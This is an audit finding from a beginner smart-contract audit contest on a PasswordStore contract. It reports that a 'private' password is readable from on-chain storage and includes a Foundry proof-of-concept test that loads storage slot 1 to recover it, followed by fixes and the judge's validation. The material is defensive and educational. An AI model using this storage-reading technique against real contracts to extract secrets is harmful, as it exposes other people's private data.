First Flight #1: PasswordStore
First Flight #1
Beginner FriendlyFoundry
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Unencrypted Private Data On-Chain

0xfuluz

Summary

attackers can look at contract transactions to determine password stored in the state of the contract and retrieve it

Vulnerability Details

Private variables are not directly readable by a user or a contract, however, this doesn’t restrict anyone from reading the state of the contract.
Add code to PasswordStore.t.sol for POC:

function test_load_password() public {
address attacker = address(1);
vm.startPrank(attacker);
assertEq(owner == attacker, false);
bytes32 passwordBytes32 = vm.load(
address(passwordStore),
bytes32(uint256(1)) // slot 0 is address of owner; password store in slot 1
);
string memory password_steal = string(
abi.encode(bytes32(passwordBytes32))
);
vm.stopPrank();
console.log("Password: ", password_steal);
}

Impact

Password can be read by not owner

Tools Used

Manual Review / Foundry

Recommendations

  • Any private data should either be stored off-chain, or carefully encrypted

  • Store hashed password use for verify only

Updates

Lead Judging Commences

inallhonesty Lead Judge
almost 2 years ago
inallhonesty Lead Judge almost 2 years ago
Submission Judgement Published
Validated
Assigned finding tags:

finding-anyone-can-read-storage

Private functions and state variables are only visible for the contract they are defined in and not in derived contracts. In this case private doesn't mean secret/confidential

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.